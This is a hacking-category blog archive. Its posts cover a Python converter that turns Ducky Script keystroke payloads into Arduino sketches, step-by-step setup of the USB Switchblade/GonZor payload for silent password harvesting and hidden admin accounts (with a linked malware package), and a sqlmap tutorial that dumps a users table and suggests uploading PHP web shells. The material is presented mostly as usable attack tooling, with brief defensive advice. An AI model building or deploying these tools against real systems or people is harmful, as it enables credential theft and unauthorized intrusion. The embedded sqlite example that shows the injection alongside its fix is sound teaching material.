Category Archives: hacking

A Study On Russian Cyber Crime

A large share of the crime that happens on the internet originates in Russia, mostly because of Russia's rather relaxed approach to enforcing laws on internet activity. With little control over what goes on online, a large underground market for cyber criminals has developed there. Some of what it sells is perfectly ordinary: VPNs, bulletproof VPSs and dedicated servers. But also on the market are botnets, DDoS attacks for hire, rootkits and other decidedly sketchy goods and services.

Reading about it is rather interesting; you begin to see how relatively cheaply you could DDoS anyone you want, or even have a custom rootkit written specially for you. It is a little scary to realise that if I made someone mad, it would be easy for them to screw up my life, as long as they knew where to look.

If you are interested in learning more about how this Russian cyber crime economy works, Trend Micro has a great white paper on the subject. If you don't want to find it on their site, you can just download it.

Installing USB Rubber Ducky On 3rd Party Devices

Earlier I posted some instructions on setting up USB Switchblade, even though, as a few people have pointed out, it is a rather outdated piece of software. I also mentioned that Hak5 has released a new product called the USB Rubber Ducky, the next generation of Switchblade. I will not be buying one: it is rather expensive for what is a small microcontroller board, and in my opinion it is not very discreet. But if you wish to invest in one you can order it from the HakShop.

I did some digging the other night and found a board called the LeoStick, an Arduino-compatible board whose microcontroller has native USB and can act as a USB HID device. That is the good news: because the LeoStick can pretend to be a USB keyboard, it can do exactly what the Rubber Ducky does, but much cheaper. I happen to have an Arduino Leonardo lying around (the same thing as a LeoStick, only bigger), so I spent an hour or two writing a quick shell script that converts Ducky Script payloads into a sketch suitable for uploading to the LeoStick (or any Arduino with USB HID capability). The end result is a small bash script which can be downloaded from here.

Usage is fairly simple: you run the script with two arguments, the first being the payload file and the second the Arduino sketch to write.

 ./compile_payload lock_prank.txt lock_prank.ino

Various payloads can be found linked from the USB Rubber Ducky wiki.

Also note that to get this working you need to edit the Arduino core so that the sendReport function of the Keyboard_ class is public. The stock core only exposes write(), which presses and releases a single key, so it cannot hold a modifier down for combinations like GUI+r; sendReport lets the sketch send a full key report. (Arduino cores from 1.0.1 onward ship Keyboard.press() and Keyboard.release(), which cover such combinations without this edit.)

To do this, edit the USBAPI.h file, which can be found in the ${ARDUINO_DIR}/hardware/arduino/cores/arduino directory.
This may be /usr/share/arduino/hardware/arduino/cores/arduino/USBAPI.h or similar.
If you installed the LeoStick board package from their website, it will be under your sketches directory as hardware/LeoStick/cores/arduino/USBAPI.h.

Open that file and find

private:
    KeyMap* _keyMap;
    void sendReport(KeyReport* keys);
    void setKeyMap(KeyMap* keyMap);
public:
    Keyboard_();
    virtual size_t write(uint8_t);

Then change that to

private:
    KeyMap* _keyMap;
    void setKeyMap(KeyMap* keyMap);
public:
    void sendReport(KeyReport* keys);
    Keyboard_();
    virtual size_t write(uint8_t);
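For readers who would rather see how such a converter works than download a bash script, here is an added example of the Ducky Script to sketch translation. It is my own Python code, not the compile_payload script from this post and not Hak5 code. It targets the stock Arduino Keyboard library (Keyboard.press, Keyboard.release, Keyboard.print, available from Arduino 1.0.1), so with it the sendReport edit above is not needed; the key names it understands are the ones listed in its MODIFIERS and KEYS tables, and the sample payload in the usage line is made up.

```python
"""Convert a Ducky Script payload into an Arduino Leonardo / LeoStick sketch.

Added example: my own Python converter, not the bash compile_payload script
from the post and not Hak5 code. It emits calls to the stock Arduino
Keyboard library (Keyboard.press / releaseAll / print), so the sendReport
edit to USBAPI.h is not required. Only the Ducky Script commands listed in
MODIFIERS and KEYS (plus REM, DELAY, STRING, DEFAULT_DELAY, REPEAT) are handled.
"""
import sys

# Ducky Script key names mapped to the Keyboard.h constants for the same keys.
MODIFIERS = {
    "GUI": "KEY_LEFT_GUI", "WINDOWS": "KEY_LEFT_GUI",
    "CTRL": "KEY_LEFT_CTRL", "CONTROL": "KEY_LEFT_CTRL",
    "ALT": "KEY_LEFT_ALT",
    "SHIFT": "KEY_LEFT_SHIFT",
}
KEYS = {
    "ENTER": "KEY_RETURN", "TAB": "KEY_TAB", "SPACE": "' '",
    "ESC": "KEY_ESC", "ESCAPE": "KEY_ESC",
    "DELETE": "KEY_DELETE", "DEL": "KEY_DELETE", "BACKSPACE": "KEY_BACKSPACE",
    "UP": "KEY_UP_ARROW", "DOWN": "KEY_DOWN_ARROW",
    "LEFT": "KEY_LEFT_ARROW", "RIGHT": "KEY_RIGHT_ARROW",
    "CAPSLOCK": "KEY_CAPS_LOCK",
}
KEYS.update({"F%d" % n: "KEY_F%d" % n for n in range(1, 13)})


def c_string(text):
    """Quote text as a C string literal so STRING payloads survive verbatim."""
    return '"' + text.replace("\\", "\\\\").replace('"', '\\"') + '"'


def key_token(tok):
    """Map one key token (GUI, ENTER, r, F5, ...) to a Keyboard.press argument."""
    if tok in MODIFIERS:
        return MODIFIERS[tok]
    if tok in KEYS:
        return KEYS[tok]
    if len(tok) == 1:
        return "'%s'" % tok.lower()   # a plain character key, e.g. the r in "GUI r"
    raise ValueError("unsupported key token: %s" % tok)


def translate_line(line):
    """Return the C++ statements (a list of strings) for one Ducky Script line."""
    line = line.strip()
    if not line or line.startswith("REM"):
        return []
    cmd, _, arg = line.partition(" ")
    if cmd == "DELAY":
        return ["delay(%d);" % int(arg)]
    if cmd == "STRING":
        return ["Keyboard.print(%s);" % c_string(arg)]
    # Anything else is a key or combination: "ENTER", "GUI r", "CTRL ALT DELETE".
    # Every key in the line is held down together, then all are released at once.
    stmts = ["Keyboard.press(%s);" % key_token(t) for t in line.split()]
    stmts.append("Keyboard.releaseAll();")
    return stmts


def compile_payload(script):
    """Convert a whole Ducky Script text into the source of a complete .ino sketch."""
    default_delay = 0
    body = []
    last = []            # statements of the previous command, for REPEAT
    for raw in script.splitlines():
        words = raw.split()
        if words and words[0] in ("DEFAULT_DELAY", "DEFAULTDELAY"):
            default_delay = int(words[1])        # pause inserted after every command
            continue
        if words and words[0] == "REPEAT":
            body.extend(last * int(words[1]))    # replay the previous command n times
            continue
        stmts = translate_line(raw)
        if stmts and default_delay and words[0] != "DELAY":
            stmts.append("delay(%d);" % default_delay)
        last = stmts
        body.extend(stmts)
    indented = "\n".join("  " + s for s in body)
    return (
        "#include <Keyboard.h>\n\n"
        "void setup() {\n"
        "  Keyboard.begin();\n"
        "  delay(1000);  // give the host time to enumerate the new keyboard\n"
        + indented + "\n"
        "  Keyboard.end();\n"
        "}\n\n"
        "void loop() {}\n"
    )


if __name__ == "__main__":
    # Usage mirrors the post's script: python compile_payload.py lock_prank.txt lock_prank.ino
    with open(sys.argv[1]) as fin, open(sys.argv[2], "w") as fout:
        fout.write(compile_payload(fin.read()))
```

The whole payload runs once from setup(), after a one-second pause so the host has finished enumerating the device before the first keystroke; anything typed before that is lost. Key lines hold every listed key down and release them together, which is what makes "GUI r" open the Run dialog rather than typing an r.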

USB Drives for Penetration Testing

USB Penetration Testing

USB ports are one of the weakest points of a computer. They exist on desktops, laptops and servers, and most of the time they are fully usable by anyone with physical access to the machine. Personally, getting access to a USB port on a server, or even on a desktop attached to the target network, is a very high priority when I'm pen testing a company. Often you only need access to a USB port once to gather enough information to compromise an organization.

USB Switchblade / Hacksaw

USB Switchblade is the product of Hak5 and the surrounding community, way back in 2006. It captures and records information about the computer it is plugged into: password hashes, IP configuration and browser auto-fill data, and some versions of Switchblade can also create a backdoor on the system for access at a later date.

To do this, Switchblade uses a U3 drive's ability to present a virtual CD-ROM drive, which allows autorun to fire. It captures password hashes for later cracking, browser history (not Chrome history!) and any autofill information on the system, as well as product keys for installed Windows products. Some versions can also create a hidden administrator account for later access. The biggest advantage of Switchblade is that all of this happens hands-free within a few seconds.

USB Rubber Ducky

USB Rubber Ducky is the next generation of Switchblade. It has its own scripting language, Ducky Script, for writing payloads. You can buy it pre-loaded for $59, but the source code is also open. I'll be posting later about how to install it on a third-party device; that post is now here. For now you can check it out on Hak5's store, or download the source code from GitHub.

USB Keyloggers

I recently wrote an article about USB keyloggers and how a top executive found a suspicious USB device inserted between his keyboard and his computer. It turned out that the device was a hardware keylogger, and unless you are doing physical inspections of hardware they are nearly undetectable. Of course, these loggers require regular access to the target machine to be useful, and they are rather pricey, but they can really change the tide of a penetration test.

The Best Option

I use USB Hacksaw or Switchblade depending on the kind of attack I am performing. It is by far the cheapest option and can give you a great deal of valuable intel, as well as a discreetly installed backdoor with Switchblade.

Setting Up USB Switchblade

Picking a USB drive

I will be setting Switchblade up on a U3 drive because U3 drives can emulate a CD drive and so launch the Switchblade payload automatically, with no interaction beyond plugging it in, potentially even against a computer whose screen is locked. Note that this silent launch depends on Windows honouring AutoRun for CD-ROM media; Windows Vista and later prompt through AutoPlay by default instead of running the program silently, so the hands-free version of the attack is mainly a Windows XP-era one.

These are the drives I will set it up on: two very unassuming drives that will draw little attention plugged into a target machine, but with enough space to hold information taken from several different computers.

Installing on the Drive

I've put together a package of everything you need. Switchblade is no longer maintained and is very difficult to find on the internet, so before you start, download that package from the bottom of the page.

Once you have downloaded it, unzip it and follow the instructions exactly.

1. Unzip the NarwhalUSB package you downloaded.

2. Open the Switchblade folder.

3. Unzip the Universal Customizer to "C:\Universal_Customizer".

4. Unzip the -=GonZor=- Payload V2.1 to "C:\Payload".

5. Copy the file U3CUSTOM.ISO from C:\Payload to C:\Universal_Customizer\BIN replacing the old one.

6. Run C:\Universal_Customizer\Universal_Customizer.exe and plug in U3 smart drive.
– Select Accept and click Next.
– Close all U3 applications and any applications that access your U3 drive and click Next.
– Set a password for the backup zip file (an empty password is not allowed).
– Click Next and it will start backing up your data. Wait for the Universal Customizer to rewrite the CD partition and restore your files to the flash drive.
– The modification should now be complete. Unplug your U3 drive and plug it back in.

7. Copy "C:\Payload\SBConfig.exe" to the mass-storage partition of the flash drive.

8. Run SBConfig.exe from the flash drive.

– Select the check boxes of the Payload options you would like to use
– Enter your email address and password for Hacksaw if you wish to use it.
– Click “Update Config” button, a message box should appear to confirm this is completed
– Toggle between using the payload or not by clicking the “Turn PL On”/”Turn PL Off” button
– Toggle between using the U3 Launcher or not by clicking the “Turn U3 Launchpad On”/”Turn U3 Launchpad Off” button

9. You now have the -=GonZor=- Payload V2.1 on your U3 smart drive, which will automatically harvest passwords when it is plugged into a computer whose logged-in user has administrative privileges.

I've tested it and it's very scary: when I plugged in the hacked U3 smart drive with the USB Switchblade payload, the payload ran silently and invisibly! It did not modify any system settings nor send any network traffic. A log file is created by the payload at F:\System\Logs\COMPUTERNAME (F: being the storage drive), and I was shocked to see my network configuration, router password, Windows Live Messenger password, Google Talk password, Gmail password, all Firefox passwords, Internet Explorer passwords, ICQ password, Windows product keys, etc. recorded in that log file!

As you can see from this guide, USB drives can be very dangerous where network security is concerned. I recommend keeping all servers inside locked racks and regularly inspecting workstations as well as private and company laptops, basically any computer that may connect to the network you are trying to secure. Disabling AutoRun and AutoPlay for all drives through Group Policy ("Turn off Autoplay" under AutoPlay Policies) removes the hands-free launch that Switchblade relies on. Have any tips for securing USB ports, or a tool you use to make your drives dangerous? Tell us in the comments.

Downloads

NarwhalUSB Package – when you download it, your antivirus will flag it as malware, because that is what it is.

Hacking With SQLMap | A Beginners Guide

sqlmap is one of the most popular and powerful SQL injection automation tools out there. Get it from http://sqlmap.org/. In this tutorial we are going to learn how to use sqlmap to exploit a vulnerable web application and see what can be done with such a tool.

For the list of options and parameters that can be used with the sqlmap command, check the following URL:
https://github.com/sqlmapproject/sqlmap/wiki/Usage

To follow this tutorial you should have a thorough understanding of how database-driven web applications work, for example those built with PHP and MySQL.

URLS

Let's say you have a URL like this

http://www.site.com/section.php?id=51

and that it is prone to SQL injection because the developer of that site did not properly escape the id parameter. This can be tested simply by opening

http://www.site.com/section.php?id=51'

We just added a single quote to the parameter. If this URL throws an error, the database has choked on the unexpected single quote, which tells you the parameter value is being pasted straight into the query text. Not every vulnerable site shows the error: with error display turned off you would instead compare the pages returned for id=51 AND 1=1 and id=51 AND 1=2, which is what sqlmap's boolean-based tests do.

Hacking with SQLMap

Now it's time to move on to sqlmap to hack such URLs. sqlmap is run from the terminal with the Python interpreter:

$ python sqlmap.py -u "http://www.site.com/section.php?id=51"

The above is the first and simplest command to run with sqlmap. It will check the URL and try to discover basic information about the system. The output can look something like this

[*] starting at 12:10:33
[12:10:33] [INFO] resuming back-end DBMS 'mysql'
[12:10:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

[12:10:37] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5

So sqlmap has discovered the operating system, web server and database, along with version information. (The "resuming" lines and the "total of 0 HTTP(s) requests" appear because sqlmap caches what it learned about a target in a session file and reuses it on later runs; on a first run you will see it send many requests while it tests the parameter.) Even this much is pretty impressive, but it's time to move on and see what more the tool can do.

Discover Databases

In this step sqlmap shall be used to find out what databases exist on the target system. Again the command is very simple

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --dbs

The output could be something like this

[*] starting at 12:12:56
[12:12:56] [INFO] resuming back-end DBMS 'mysql'
[12:12:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

[12:13:00] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:13:00] [INFO] fetching database names
[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: safecosmetics
available databases [2]:
[*] information_schema
[*] safecosmetics

This time the output contains the list of available databases. Moving on...

Find tables in the database

Now it's time to find out what tables exist in a particular database. Let's say the database of interest here is 'safecosmetics'.

Command

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D safecosmetics

and the output can be something similar to this

[11:55:18] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[11:55:18] [INFO] fetching tables for database: 'safecosmetics'
[11:55:19] [INFO] heuristics detected web page charset 'ascii'
[11:55:19] [INFO] the SQL query used returns 216 entries
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections
[11:55:22] [INFO] retrieved: acl_acl_seq
[11:55:24] [INFO] retrieved: acl_aco
[11:55:25] [INFO] retrieved: acl_aco_map
[11:55:26] [INFO] retrieved: acl_aco_sections
[11:55:28] [INFO] retrieved: acl_aco_sections_seq
………..

Isn't this amazing? It is, of course. Let's get the columns of a particular table now.

Get columns of a table

Now that we have the list of tables, it would be a good idea to get the columns of an interesting table. Let's say the table is 'users' and it holds the usernames and passwords.

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D safecosmetics -T users

The output can be something like this

[12:17:39] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'
[12:17:41] [INFO] heuristics detected web page charset 'ascii'
[12:17:41] [INFO] the SQL query used returns 8 entries
[12:17:42] [INFO] retrieved: id
[12:17:43] [INFO] retrieved: int(11)
[12:17:45] [INFO] retrieved: name
[12:17:46] [INFO] retrieved: text
[12:17:47] [INFO] retrieved: password
[12:17:48] [INFO] retrieved: text
[12:17:49] [INFO] retrieved: permission
[12:17:51] [INFO] retrieved: tinyint(4)
[12:17:52] [INFO] retrieved: email
[12:17:53] [INFO] retrieved: text
[12:17:54] [INFO] retrieved: system_home
[12:17:55] [INFO] retrieved: text
[12:17:57] [INFO] retrieved: system_allow_only
[12:17:58] [INFO] retrieved: text
[12:17:59] [INFO] retrieved: hash
[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
+-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| email             | text         |
| hash              | varchar(128) |
| id                | int(11)      |
| name              | text         |
| password          | text         |
| permission        | tinyint(4)   |
| system_allow_only | text         |
| system_home       | text         |
+-------------------+--------------+

So now the columns are clearly visible. Good job!

Get data of the table

Now comes the most interesting part: extracting the data from the table. The command would be

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D safecosmetics -T users

The above command simply dumps the contents of that table, much like the mysqldump command would.
The output might look similar to this

+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| id | hash               | name      | email     | password | permission | system_home | system_allow_only |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| 1  | 5DIpzzDHFOwnCvPonu | admin     | <blank>   | <blank>  | 3          | <blank>     | <blank>           |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+

The hash column appears to hold the password hash. Crack that hash and you have the login details right away. sqlmap also writes the dumped data to a CSV file under its output directory for easy analysis.
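To make the single-quote test from the start of this tutorial and the --tables / --dump steps just shown concrete, here is an added, self-contained example (my own code, not sqlmap's and not part of the original tutorial). It uses Python's sqlite3 module in place of MySQL, with a constructed schema mirroring the safecosmetics dump above, and besides the error-based check it also runs the boolean-based comparison (AND 1=1 versus AND 1=2) that sqlmap falls back to when no database error is displayed, which goes slightly beyond the tutorial's error-based case. The catalogue table queried is sqlite_master; on MySQL the equivalent is information_schema.tables.

```python
"""Offline model of the ?id= injection this tutorial exploits with sqlmap.

Added example written for this page; not sqlmap code and not the tutorial
author's. The tutorial's target is PHP + MySQL; here Python's sqlite3
module stands in for the database so everything runs locally. The schema
and rows are constructed to mirror the 'safecosmetics' dump shown above.
section_vulnerable() builds its query by string concatenation, as a
careless section.php would; section_safe() is the fixed version.
"""
import sqlite3


def make_db():
    """Constructed sample database: a sections table and the users table dumped above."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE sections (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, hash TEXT, permission INTEGER);
        INSERT INTO sections VALUES (51, 'Lipstick');
        INSERT INTO sections VALUES (52, 'Mascara');
        INSERT INTO users VALUES (1, 'admin', '5DIpzzDHFOwnCvPonu', 3);
    """)
    return db


def section_vulnerable(db, id_param):
    """The bug: the raw ?id= value is pasted into the SQL text.

    Returns ("ok", titles) or ("error", message). A PHP page with
    display_errors on would print that message into the HTML, which is
    exactly the reaction the single-quote test looks for.
    """
    sql = "SELECT title FROM sections WHERE id = " + id_param
    try:
        return ("ok", [row[0] for row in db.execute(sql).fetchall()])
    except sqlite3.Error as exc:
        return ("error", str(exc))


def section_safe(db, id_param):
    """The fix: validate the expected type, then bind the value as a parameter."""
    if not id_param.isdigit():
        return ("bad_request", [])       # rejected before any SQL is built
    rows = db.execute("SELECT title FROM sections WHERE id = ?", (int(id_param),))
    return ("ok", [row[0] for row in rows.fetchall()])


def probe(handler, db):
    """The two detection checks described in the tutorial, run against a handler.

    error_on_quote: does id=51' produce a database error?
    boolean_blind:  do id=51 AND 1=1 and id=51 AND 1=2 give different pages?
    Either being True means the parameter is injectable.
    """
    quote_status, _ = handler(db, "51'")
    return {
        "error_on_quote": quote_status == "error",
        "boolean_blind": handler(db, "51 AND 1=1") != handler(db, "51 AND 1=2"),
    }


def dump_tables(db):
    """What --tables does underneath: a UNION against the catalogue table."""
    status, rows = section_vulnerable(
        db, "-1 UNION SELECT name FROM sqlite_master WHERE type='table'")
    return sorted(rows) if status == "ok" else []


def dump_users(db):
    """What --dump -T users does underneath: pull name and hash through the same hole."""
    status, rows = section_vulnerable(db, "-1 UNION SELECT name || ':' || hash FROM users")
    return rows if status == "ok" else []


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", probe(section_vulnerable, db), dump_tables(db), dump_users(db))
    print("safe:      ", probe(section_safe, db))
```

The vulnerable handler fails both probes and then leaks the table list and the users table through a UNION, which is the mechanism behind the sqlmap output above. The fixed handler validates the type and binds the value, so every probe gets the same answer and there is nothing left for a tool like sqlmap to distinguish.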

What Next ?

Execute arbitrary SQL commands on the server

This is probably the easiest thing to do on a server vulnerable to SQL injection. The --sql-query parameter specifies a SQL statement to execute. Things of interest would be creating a user in the users table, or changing the content of CMS pages. Note that SELECT results come back through the injection point itself, but statements that write (INSERT, UPDATE and so on) only work when the injection point supports stacked queries, which sqlmap has to have detected.

Another parameter, --sql-shell, gives an interactive SQL shell for running queries.

Get inside the admin panel and play

If the website runs some kind of custom CMS with an admin panel, it might be possible to get in, provided you can crack the password hash retrieved in the dump. Short, simple passwords fall quickly to brute force; long, complex ones may not be breakable.

Check whether the admin panel allows file uploads. If an arbitrary PHP file can be uploaded, things get a lot more interesting: the file can call shell_exec, system, exec or passthru, which allows execution of arbitrary system commands. PHP web shell scripts can be uploaded to do the same thing.

Shell on remote OS

This is the way to take over the server completely. Note, however, that it is not as easy as the tricks shown above. sqlmap has a parameter, --os-shell, that tries to get a shell on the remote system, but it has many limitations of its own.

According to the sqlmap manual

It is possible to run arbitrary commands on the database server’s underlying operating system when the back-end database management system is either MySQL, PostgreSQL or Microsoft SQL Server, and the session user has the needed privileges to abuse database specific functionalities and architectural weaknesses.

The key privilege the current database user needs is the ability to write files through database functions (the FILE privilege on MySQL, for example), and for the web server case the document root must be writable by the database process so that a stager can be dropped into it. This is absent in most cases, so the technique usually will not work.

Note

1. Sometimes sqlmap is unable to connect to the URL at all. This shows up as it getting stuck at the first task, "testing connection to the target url". In such cases the --random-agent option helps: it makes sqlmap send a valid User-Agent header like those sent by browsers such as Chrome or Firefox, instead of its default one, which some sites block.

2. For URLs that are not in the param=value form, sqlmap cannot automatically know where to inject, for example MVC-style URLs like http://www.site.com/class_name/method/43/80.

In such cases sqlmap needs to be told the injection point, marked with a *:

http://www.site.com/class_name/method/43*/80

The above tells sqlmap to inject at the point marked by *.